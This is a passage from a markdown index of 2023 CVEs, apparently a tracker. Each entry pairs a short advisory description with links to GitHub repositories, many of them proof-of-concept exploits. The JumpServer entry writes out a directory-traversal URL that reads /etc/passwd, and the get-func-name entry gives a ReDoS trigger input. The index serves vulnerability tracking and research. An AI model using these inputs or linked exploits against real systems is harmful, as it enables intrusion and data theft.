[charlesgargasson/CVE-2023-41425](https://github.com/charlesgargasson/CVE-2023-41425) +- [insomnia-jacob/CVE-2023-41425](https://github.com/insomnia-jacob/CVE-2023-41425) +- [tiyeume25112004/CVE-2023-41425](https://github.com/tiyeume25112004/CVE-2023-41425) +- [thefizzyfish/CVE-2023-41425-wonderCMS_RCE](https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE) +- [Raffli-Dev/CVE-2023-41425](https://github.com/Raffli-Dev/CVE-2023-41425) +- [duck-sec/CVE-2023-41425](https://github.com/duck-sec/CVE-2023-41425) +- [0xDTC/WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425](https://github.com/0xDTC/WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425) +- [h3athen/CVE-2023-41425](https://github.com/h3athen/CVE-2023-41425) +- [Diegomjx/CVE-2023-41425-WonderCMS-Authenticated-RCE](https://github.com/Diegomjx/CVE-2023-41425-WonderCMS-Authenticated-RCE) + +### CVE-2023-41436 (2023-09-15) + +Cross Site Scripting vulnerability in CSZCMS v.1.3.0 allows a local attacker to execute arbitrary code via a crafted script to the Additional Meta Tag parameter in the Pages Content Menu component. + + +- [sromanhu/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content](https://github.com/sromanhu/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content) + +### CVE-2023-41474 (2024-01-25) + +Directory Traversal vulnerability in Ivanti Avalanche 6.3.4.153 allows a remote authenticated attacker to obtain sensitive information via the javax.faces.resource component. + + +- [JBalanza/CVE-2023-41474](https://github.com/JBalanza/CVE-2023-41474) + +### CVE-2023-41507 (2023-09-05) + +Super Store Finder v3.6 was discovered to contain multiple SQL injection vulnerabilities in the store locator component via the products, distance, lat, and lng parameters. + + +- [redblueteam/CVE-2023-41507](https://github.com/redblueteam/CVE-2023-41507) + +### CVE-2023-41508 (2023-09-05) + +A hard coded password in Super Store Finder v3.6 allows attackers to access the administration panel. + + +- [redblueteam/CVE-2023-41508](https://github.com/redblueteam/CVE-2023-41508) + +### CVE-2023-41533 +- [Sh33talUmath/CVE-2023-41533](https://github.com/Sh33talUmath/CVE-2023-41533) + +### CVE-2023-41534 +- [Sh33talUmath/CVE-2023-41534](https://github.com/Sh33talUmath/CVE-2023-41534) + +### CVE-2023-41535 +- [Sh33talUmath/CVE-2023-41535](https://github.com/Sh33talUmath/CVE-2023-41535) + +### CVE-2023-41564 (2023-09-08) + +An arbitrary file upload vulnerability in the Upload Asset function of Cockpit CMS v2.6.3 allows attackers to execute arbitrary code via uploading a crafted .shtml file. + + +- [sota70/cve-2023-41564-research](https://github.com/sota70/cve-2023-41564-research) + +### CVE-2023-41575 (2023-09-08) + +Multiple stored cross-site scripting (XSS) vulnerabilities in /bbdms/sign-up.php of Blood Bank & Donor Management v2.2 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Full Name, Message, or Address parameters. + + +- [soundarkutty/Stored-xss](https://github.com/soundarkutty/Stored-xss) + +### CVE-2023-41592 (2023-09-14) + +Froala Editor v4.0.1 to v4.1.1 was discovered to contain a cross-site scripting (XSS) vulnerability. + + +- [miguelc49/CVE-2023-41592-2](https://github.com/miguelc49/CVE-2023-41592-2) +- [miguelc49/CVE-2023-41592-1](https://github.com/miguelc49/CVE-2023-41592-1) +- [miguelc49/CVE-2023-41592-3](https://github.com/miguelc49/CVE-2023-41592-3) + +### CVE-2023-41593 (2023-09-11) + +Multiple cross-site scripting (XSS) vulnerabilities in Dairy Farm Shop Management System Using PHP and MySQL v1.1 allow attackers to execute arbitrary web scripts and HTML via a crafted payload injected into the Category and Category Field parameters. + + +- [MATRIXDEVIL/CVE](https://github.com/MATRIXDEVIL/CVE) + +### CVE-2023-41613 (2023-12-04) + +EzViz Studio v2.2.0 is vulnerable to DLL hijacking. + + +- [Eafz/cve-2023-41613](https://github.com/Eafz/cve-2023-41613) + +### CVE-2023-41623 (2023-12-12) + +Emlog version pro2.1.14 was discovered to contain a SQL injection vulnerability via the uid parameter at /admin/media.php. + + +- [GhostBalladw/wuhaozhe-s-CVE](https://github.com/GhostBalladw/wuhaozhe-s-CVE) + +### CVE-2023-41646 (2023-09-07) + +Buttercup v2.20.3 allows attackers to obtain the hash of the master password for the password manager via accessing the file /vaults.json/ + + +- [tristao-marinho/CVE-2023-41646](https://github.com/tristao-marinho/CVE-2023-41646) + +### CVE-2023-41652 (2023-11-03) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David F. Carr RSVPMaker rsvpmaker allows SQL Injection.This issue affects RSVPMaker: from n/a through 10.6.6.\n\n + + +- [RandomRobbieBF/CVE-2023-41652](https://github.com/RandomRobbieBF/CVE-2023-41652) + +### CVE-2023-41717 (2023-08-31) + +Inappropriate file type control in Zscaler Proxy versions 3.6.1.25 and prior allows local attackers to bypass file download/upload restrictions. + + +- [federella/CVE-2023-41717](https://github.com/federella/CVE-2023-41717) + +### CVE-2023-41772 (2023-10-10) + +Win32k Elevation of Privilege Vulnerability + + +- [R41N3RZUF477/CVE-2023-41772](https://github.com/R41N3RZUF477/CVE-2023-41772) + +### CVE-2023-41892 (2023-09-13) + +Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector. Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15. + + +- [zaenhaxor/CVE-2023-41892](https://github.com/zaenhaxor/CVE-2023-41892) +- [0xfalafel/CraftCMS_CVE-2023-41892](https://github.com/0xfalafel/CraftCMS_CVE-2023-41892) +- [diegaccio/Craft-CMS-Exploit](https://github.com/diegaccio/Craft-CMS-Exploit) +- [acesoyeo/CVE-2023-41892](https://github.com/acesoyeo/CVE-2023-41892) +- [CERTologists/HTTP-Request-for-PHP-object-injection-attack-on-CVE-2023-41892](https://github.com/CERTologists/HTTP-Request-for-PHP-object-injection-attack-on-CVE-2023-41892) + +### CVE-2023-41991 (2023-09-21) + +A certificate validation issue was addressed. This issue is fixed in macOS Ventura 13.6, iOS 16.7 and iPadOS 16.7. A malicious app may be able to bypass signature validation. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7. + + +- [Zenyith/CVE-2023-41991](https://github.com/Zenyith/CVE-2023-41991) + +### CVE-2023-41993 (2023-09-21) + +The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7. + + +- [po6ix/POC-for-CVE-2023-41993](https://github.com/po6ix/POC-for-CVE-2023-41993) +- [hrtowii/cve-2023-41993-test](https://github.com/hrtowii/cve-2023-41993-test) +- [0x06060606/CVE-2023-41993](https://github.com/0x06060606/CVE-2023-41993) +- [Mangaia/cve-test](https://github.com/Mangaia/cve-test) +- [J3Ss0u/CVE-2023-41993](https://github.com/J3Ss0u/CVE-2023-41993) + +### CVE-2023-42115 (2024-05-03) + +Exim AUTH Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Exim. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the smtp service, which listens on TCP port 25 by default. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of a buffer. An attacker can leverage this vulnerability to execute code in the context of the service account.\n. Was ZDI-CAN-17434. + + +- [kirinse/cve-2023-42115](https://github.com/kirinse/cve-2023-42115) +- [AdaHop-Cyber-Security/Pocy](https://github.com/AdaHop-Cyber-Security/Pocy) + +### CVE-2023-42222 (2023-09-28) + +WebCatalog before 49.0 is vulnerable to Incorrect Access Control. WebCatalog calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource, in some circumstances. + + +- [itssixtyn3in/CVE-2023-42222](https://github.com/itssixtyn3in/CVE-2023-42222) + +### CVE-2023-42283 (2023-11-07) + +Blind SQL injection in api_id parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query. + + +- [andreysanyuk/CVE-2023-42283](https://github.com/andreysanyuk/CVE-2023-42283) + +### CVE-2023-42284 (2023-11-07) + +Blind SQL injection in api_version parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query. + + +- [andreysanyuk/CVE-2023-42284](https://github.com/andreysanyuk/CVE-2023-42284) + +### CVE-2023-42326 (2023-11-14) + +An issue in Netgate pfSense v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components. + + +- [bl4ckarch/CVE-2023-42326](https://github.com/bl4ckarch/CVE-2023-42326) +- [Farzan-Kh/CVE-2023-42326](https://github.com/Farzan-Kh/CVE-2023-42326) + +### CVE-2023-42362 (2023-09-14) + +An arbitrary file upload vulnerability in Teller Web App v.4.4.0 allows a remote attacker to execute arbitrary commands and obtain sensitive information via uploading a crafted file. + + +- [Mr-n0b3dy/CVE-2023-42362](https://github.com/Mr-n0b3dy/CVE-2023-42362) + +### CVE-2023-42413 +- [chenghao-hao/cve-2023-42413](https://github.com/chenghao-hao/cve-2023-42413) + +### CVE-2023-42426 (2023-09-25) + +Cross-site scripting (XSS) vulnerability in Froala Froala Editor v.4.1.1 allows remote attackers to execute arbitrary code via the 'Insert link' parameter in the 'Insert Image' component. + + +- [b0marek/CVE-2023-42426](https://github.com/b0marek/CVE-2023-42426) + +### CVE-2023-42442 (2023-09-15) + +JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n + + +- [HolyGu/CVE-2023-42442](https://github.com/HolyGu/CVE-2023-42442) +- [tarihub/blackjump](https://github.com/tarihub/blackjump) +- [C1ph3rX13/CVE-2023-42442](https://github.com/C1ph3rX13/CVE-2023-42442) + +### CVE-2023-42468 (2023-09-13) + +The com.cutestudio.colordialer application through 2.1.8-2 for Android allows a remote attacker to initiate phone calls without user consent, because of improper export of the com.cutestudio.dialer.activities.DialerActivity component. A third-party application (without any permissions) can craft an intent targeting com.cutestudio.dialer.activities.DialerActivity via the android.intent.action.CALL action in conjunction with a tel: URI, thereby placing a phone call. + + +- [actuator/com.cutestudio.colordialer](https://github.com/actuator/com.cutestudio.colordialer) + +### CVE-2023-42469 (2023-09-13) + +The com.full.dialer.top.secure.encrypted application through 1.0.1 for Android enables any installed application (with no permissions) to place phone calls without user interaction by sending a crafted intent via the com.full.dialer.top.secure.encrypted.activities.DialerActivity component. + + +- [actuator/com.full.dialer.top.secure.encrypted](https://github.com/actuator/com.full.dialer.top.secure.encrypted) + +### CVE-2023-42470 (2023-09-11) + +The Imou Life com.mm.android.smartlifeiot application through 6.8.0 for Android allows Remote Code Execution via a crafted intent to an exported component. This relates to the com.mm.android.easy4ip.MainActivity activity. JavaScript execution is enabled in the WebView, and direct web content loading occurs. + + +- [actuator/imou](https://github.com/actuator/imou) + +### CVE-2023-42471 (2023-09-11) + +The wave.ai.browser application through 1.0.35 for Android allows a remote attacker to execute arbitrary JavaScript code via a crafted intent. It contains a manifest entry that exports the wave.ai.browser.ui.splash.SplashScreen activity. This activity uses a WebView component to display web content and doesn't adequately validate or sanitize the URI or any extra data passed in the intent by a third party application (with no permissions). + + +- [actuator/wave.ai.browser](https://github.com/actuator/wave.ai.browser) + +### CVE-2023-42789 (2024-03-12) + +A out-of-bounds write in Fortinet FortiOS 7.4.0 through 7.4.1, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, FortiProxy 7.4.0, 7.2.0 through 7.2.6, 7.0.0 through 7.0.12, 2.0.0 through 2.0.13 allows attacker to execute unauthorized code or commands via specially crafted HTTP requests. + + +- [jhonnybonny/CVE-2023-42789](https://github.com/jhonnybonny/CVE-2023-42789) + +### CVE-2023-42793 (2023-09-19) + +In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible + + +- [H454NSec/CVE-2023-42793](https://github.com/H454NSec/CVE-2023-42793) +- [whoamins/CVE-2023-42793](https://github.com/whoamins/CVE-2023-42793) +- [Zenmovie/CVE-2023-42793](https://github.com/Zenmovie/CVE-2023-42793) +- [johnossawy/CVE-2023-42793_POC](https://github.com/johnossawy/CVE-2023-42793_POC) +- [StanleyJobsonAU/GhostTown](https://github.com/StanleyJobsonAU/GhostTown) +- [hotplugin0x01/CVE-2023-42793](https://github.com/hotplugin0x01/CVE-2023-42793) +- [Zyad-Elsayed/CVE-2023-42793](https://github.com/Zyad-Elsayed/CVE-2023-42793) +- [junnythemarksman/CVE-2023-42793](https://github.com/junnythemarksman/CVE-2023-42793) +- [HusenjanDev/CVE-2023-42793](https://github.com/HusenjanDev/CVE-2023-42793) +- [FlojBoj/CVE-2023-42793](https://github.com/FlojBoj/CVE-2023-42793) +- [SwiftSecur/teamcity-exploit-cve-2023-42793](https://github.com/SwiftSecur/teamcity-exploit-cve-2023-42793) + +### CVE-2023-42819 (2023-09-26) + +JumpServer is an open source bastion host. Logged-in users can access and modify the contents of any file on the system. A user can use the 'Job-Template' menu and create a playbook named 'test'. Get the playbook id from the detail page, like 'e0adabef-c38f-492d-bd92-832bacc3df5f'. An attacker can exploit the directory traversal flaw using the provided URL to access and retrieve the contents of the file. `https://jumpserver-ip/api/v1/ops/playbook/e0adabef-c38f-492d-bd92-832bacc3df5f/file/?key=../../../../../../../etc/passwd` a similar method to modify the file content is also present. This issue has been addressed in version 3.6.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n + + +- [C1ph3rX13/CVE-2023-42819](https://github.com/C1ph3rX13/CVE-2023-42819) + +### CVE-2023-42820 (2023-09-26) + +JumpServer is an open source bastion host. This vulnerability is due to exposing the random number seed to the API, potentially allowing the randomly generated verification codes to be replayed, which could lead to password resets. If MFA is enabled users are not affect. Users not using local authentication are also not affected. Users are advised to upgrade to either version 2.28.19 or to 3.6.5. There are no known workarounds or this issue. + + +- [C1ph3rX13/CVE-2023-42820](https://github.com/C1ph3rX13/CVE-2023-42820) +- [Startr4ck/cve-2023-42820](https://github.com/Startr4ck/cve-2023-42820) + +### CVE-2023-42860 (2024-02-21) + +A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. An app may be able to modify protected parts of the file system. + + +- [Trigii/CVE-2023-42860](https://github.com/Trigii/CVE-2023-42860) + +### CVE-2023-42931 (2024-03-28) + +The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6.3, macOS Sonoma 14.2, macOS Monterey 12.7.2. A process may gain admin privileges without proper authentication. + + +- [d0rb/CVE-2023-42931](https://github.com/d0rb/CVE-2023-42931) + +### CVE-2023-43040 (2024-05-13) + +IBM Spectrum Fusion HCI 2.5.2 through 2.7.2 could allow an attacker to perform unauthorized actions in RGW for Ceph due to improper bucket access. IBM X-Force ID: 266807. + + +- [riza/CVE-2023-43040](https://github.com/riza/CVE-2023-43040) + +### CVE-2023-43115 (2023-09-18) + +In Artifex Ghostscript through 10.01.2, gdevijs.c in GhostPDL can lead to remote code execution via crafted PostScript documents because they can switch to the IJS device, or change the IjsServer parameter, after SAFER has been activated. NOTE: it is a documented risk that the IJS server can be specified on a gs command line (the IJS device inherently must execute a command to start the IJS server). + + +- [jostaub/ghostscript-CVE-2023-43115](https://github.com/jostaub/ghostscript-CVE-2023-43115) + +### CVE-2023-43144 (2023-09-22) + +Projectworldsl Assets-management-system-in-php 1.0 is vulnerable to SQL Injection via the "id" parameter in delete.php. + + +- [Pegasus0xx/CVE-2023-43144](https://github.com/Pegasus0xx/CVE-2023-43144) + +### CVE-2023-43147 (2023-10-12) + +PHPJabbers Limo Booking Software 1.0 is vulnerable to Cross Site Request Forgery (CSRF) to add an admin user via the Add Users Function, aka an index.php?controller=pjAdminUsers&action=pjActionCreate URI. + + +- [MinoTauro2020/CVE-2023-43147](https://github.com/MinoTauro2020/CVE-2023-43147) + +### CVE-2023-43148 (2023-10-12) + +SPA-Cart 1.9.0.3 has a Cross Site Request Forgery (CSRF) vulnerability that allows a remote attacker to delete all accounts. + + +- [MinoTauro2020/CVE-2023-43148](https://github.com/MinoTauro2020/CVE-2023-43148) + +### CVE-2023-43149 (2023-10-12) + +SPA-Cart 1.9.0.3 is vulnerable to Cross Site Request Forgery (CSRF) that allows a remote attacker to add an admin user with role status. + + +- [MinoTauro2020/CVE-2023-43149](https://github.com/MinoTauro2020/CVE-2023-43149) + +### CVE-2023-43154 (2023-09-26) + +In Macrob7 Macs Framework Content Management System (CMS) 1.1.4f, loose comparison in "isValidLogin()" function during login attempt results in PHP type confusion vulnerability that leads to authentication bypass and takeover of the administrator account. + + +- [ally-petitt/CVE-2023-43154-PoC](https://github.com/ally-petitt/CVE-2023-43154-PoC) + +### CVE-2023-43177 (2023-11-17) + +CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes. + + +- [the-emmons/CVE-2023-43177](https://github.com/the-emmons/CVE-2023-43177) + +### CVE-2023-43208 (2023-10-26) + +NextGen Healthcare Mirth Connect before version 4.4.1 is vulnerable to unauthenticated remote code execution. Note that this vulnerability is caused by the incomplete patch of CVE-2023-37679. + + +- [K3ysTr0K3R/CVE-2023-43208-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-43208-EXPLOIT) +- [jakabakos/CVE-2023-43208-mirth-connect-rce-poc](https://github.com/jakabakos/CVE-2023-43208-mirth-connect-rce-poc) +- [J4F9S5D2Q7/CVE-2023-43208-MIRTHCONNECT](https://github.com/J4F9S5D2Q7/CVE-2023-43208-MIRTHCONNECT) +- [Avento/CVE-2023-43208_Detection_PoC](https://github.com/Avento/CVE-2023-43208_Detection_PoC) + +### CVE-2023-43261 (2023-10-04) + +An information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 allows attackers to access sensitive router components. + + +- [win3zz/CVE-2023-43261](https://github.com/win3zz/CVE-2023-43261) + +### CVE-2023-43263 (2023-09-26) + +A Cross-site scripting (XSS) vulnerability in Froala Editor v.4.1.1 allows attackers to execute arbitrary code via the Markdown component. + + +- [b0marek/CVE-2023-43263](https://github.com/b0marek/CVE-2023-43263) + +### CVE-2023-43284 (2023-10-05) + +D-Link Wireless MU-MIMO Gigabit AC1200 Router DIR-846 100A53DBR-Retail devices allow an authenticated remote attacker to execute arbitrary code via an unspecified manipulation of the QoS POST parameter. + + +- [MateusTesser/CVE-2023-43284](https://github.com/MateusTesser/CVE-2023-43284) + +### CVE-2023-43317 (2024-01-24) + +An issue in Coign CRM Portal v.06.06 allows a remote attacker to escalate privileges via the userPermissionsList parameter in Session Storage component. + + +- [amjadali-110/CVE-2023-43317](https://github.com/amjadali-110/CVE-2023-43317) + +### CVE-2023-43318 (2024-03-05) + +TP-Link JetStream Smart Switch TL-SG2210P 5.0 Build 20211201 allows attackers to escalate privileges via modification of the 'tid' and 'usrlvl' values in GET requests. + + +- [str2ver/CVE-2023-43318](https://github.com/str2ver/CVE-2023-43318) + +### CVE-2023-43323 (2023-09-28) + +mooSocial 3.1.8 is vulnerable to external service interaction on post function. When executed, the server sends a HTTP and DNS request to external server. The Parameters effected are multiple - messageText, data[wall_photo], data[userShareVideo] and data[userShareLink]. + + +- [ahrixia/CVE-2023-43323](https://github.com/ahrixia/CVE-2023-43323) + +### CVE-2023-43325 (2023-09-25) + +A reflected cross-site scripting (XSS) vulnerability in the data[redirect_url] parameter of mooSocial v3.1.8 allows attackers to steal user's session cookies and impersonate their account via a crafted URL. + + +- [ahrixia/CVE-2023-43325](https://github.com/ahrixia/CVE-2023-43325) + +### CVE-2023-43326 (2023-09-25) + +A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 allows attackers to steal user's session cookies and impersonate their account via a crafted URL. + + +- [ahrixia/CVE-2023-43326](https://github.com/ahrixia/CVE-2023-43326) + +### CVE-2023-43339 (2023-09-25) + +Cross-Site Scripting (XSS) vulnerability in cmsmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted payload injected into the Database Name, DataBase User or Database Port components. + + +- [sromanhu/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation](https://github.com/sromanhu/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation) + +### CVE-2023-43340 (2023-10-19) + +Cross-site scripting (XSS) vulnerability in evolution v.3.2.3 allows a local attacker to execute arbitrary code via a crafted payload injected into the cmsadmin, cmsadminemail, cmspassword and cmspasswordconfim parameters + + +- [sromanhu/-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options](https://github.com/sromanhu/-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options) + +### CVE-2023-43341 (2023-10-19) + +Cross-site scripting (XSS) vulnerability in evolution evo v.3.2.3 allows a local attacker to execute arbitrary code via a crafted payload injected uid parameter. + + +- [sromanhu/CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-](https://github.com/sromanhu/CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-) + +### CVE-2023-43342 (2023-10-19) + +Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Languages Menu component. + + +- [sromanhu/CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend](https://github.com/sromanhu/CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend) + +### CVE-2023-43343 (2023-10-05) + +Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Files - Description parameter in the Pages Menu component. + + +- [sromanhu/CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files](https://github.com/sromanhu/CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files) + +### CVE-2023-43344 (2023-10-19) + +Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the SEO - Meta description parameter in the Pages Menu component. + + +- [sromanhu/CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description](https://github.com/sromanhu/CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description) + +### CVE-2023-43345 (2023-10-19) + +Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Content - Name parameter in the Pages Menu component. + + +- [sromanhu/CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content](https://github.com/sromanhu/CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content) + +### CVE-2023-43346 (2023-10-20) + +Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Backend - Dashboard parameter in the Languages Menu component. + + +- [sromanhu/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend](https://github.com/sromanhu/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend) + +### CVE-2023-43352 (2023-10-26) + +An issue in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted payload to the Content Manager Menu component. + + +- [sromanhu/CVE-2023-43352-CMSmadesimple-SSTI--Content](https://github.com/sromanhu/CVE-2023-43352-CMSmadesimple-SSTI--Content) + +### CVE-2023-43353 (2023-10-20) + +Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the extra parameter in the news menu component. + + +- [sromanhu/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra](https://github.com/sromanhu/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra) + +### CVE-2023-43354 (2023-10-20) + +Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Profiles parameter in the Extensions -MicroTiny WYSIWYG editor component. + + +- [sromanhu/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension](https://github.com/sromanhu/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension) + +### CVE-2023-43355 (2023-10-20) + +Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the password and password again parameters in the My Preferences - Add user component. + + +- [sromanhu/CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user](https://github.com/sromanhu/CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user) + +### CVE-2023-43356 (2023-10-20) + +Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Global Meatadata parameter in the Global Settings Menu component. + + +- [sromanhu/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings](https://github.com/sromanhu/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings) + +### CVE-2023-43357 (2023-10-20) + +Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title parameter in the Manage Shortcuts component. + + +- [sromanhu/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut](https://github.com/sromanhu/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut) + +### CVE-2023-43358 (2023-10-23) + +Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title parameter in the News Menu component. + + +- [sromanhu/CVE-2023-43358-CMSmadesimple-Stored-XSS---News](https://github.com/sromanhu/CVE-2023-43358-CMSmadesimple-Stored-XSS---News) + +### CVE-2023-43359 (2023-10-19) + +Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Page Specific Metadata and Smarty data parameters in the Content Manager Menu component. + + +- [sromanhu/CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager](https://github.com/sromanhu/CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager) + +### CVE-2023-43360 (2023-10-24) + +Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Top Directory parameter in the File Picker Menu component. + + +- [sromanhu/CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension](https://github.com/sromanhu/CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension) + +### CVE-2023-43364 (2023-12-12) + +main.py in Searchor before 2.4.2 uses eval on CLI input, which may cause unexpected code execution. + + +- [libertycityhacker/CVE-2023-43364-Exploit-CVE](https://github.com/libertycityhacker/CVE-2023-43364-Exploit-CVE) + +### CVE-2023-43481 (2023-12-27) + +An issue in Shenzhen TCL Browser TV Web BrowseHere (aka com.tcl.browser) 6.65.022_dab24cc6_231221_gp allows a remote attacker to execute arbitrary JavaScript code via the com.tcl.browser.portal.browse.activity.BrowsePageActivity component. + + +- [actuator/com.tcl.browser](https://github.com/actuator/com.tcl.browser) + +### CVE-2023-43482 (2024-02-06) + +A command execution vulnerability exists in the guest resource functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. + + +- [Mr-xn/CVE-2023-43482](https://github.com/Mr-xn/CVE-2023-43482) + +### CVE-2023-43494 (2023-09-20) + +Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered. + + +- [mqxmm/CVE-2023-43494](https://github.com/mqxmm/CVE-2023-43494) + +### CVE-2023-43622 (2023-10-23) + +An attacker, opening a HTTP/2 connection with an initial window size of 0, was able to block handling of that connection indefinitely in Apache HTTP Server. This could be used to exhaust worker resources in the server, similar to the well known "slow loris" attack pattern.\nThis has been fixed in version 2.4.58, so that such connection are terminated properly after the configured connection timeout.\n\nThis issue affects Apache HTTP Server: from 2.4.55 through 2.4.57.\n\nUsers are recommended to upgrade to version 2.4.58, which fixes the issue.\n\n + + +- [visudade/CVE-2023-43622](https://github.com/visudade/CVE-2023-43622) + +### CVE-2023-43646 (2023-09-26) + +get-func-name is a module to retrieve a function's name securely and consistently both in NodeJS and the browser. Versions prior to 2.0.1 are subject to a regular expression denial of service (redos) vulnerability which may lead to a denial of service when parsing malicious input. This vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input: '\t'.repeat(54773) + '\t/function/i'. This issue has been addressed in commit `f934b228b` which has been included in releases from 2.0.1. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [200101WhoAmI/CVE-2023-43646](https://github.com/200101WhoAmI/CVE-2023-43646) + +### CVE-2023-43654 (2023-09-28) + +TorchServe is a tool for serving and scaling PyTorch models in production. TorchServe default configuration lacks proper input validation, enabling third parties to invoke remote HTTP download requests and write files to the disk. This issue could be taken advantage of to compromise the integrity of the system and sensitive data. This issue is present in versions 0.1.0 to 0.8.1. A user is able to load the model of their choice from any URL that they would like to use. The user of TorchServe is responsible for configuring both the allowed_urls and specifying the model URL to be used. A pull request to warn the user when the default value for allowed_urls is used has been merged in PR #2534. TorchServe release 0.8.2 includes this change. Users are advised to upgrade. There are no known workarounds for this issue. + + +- 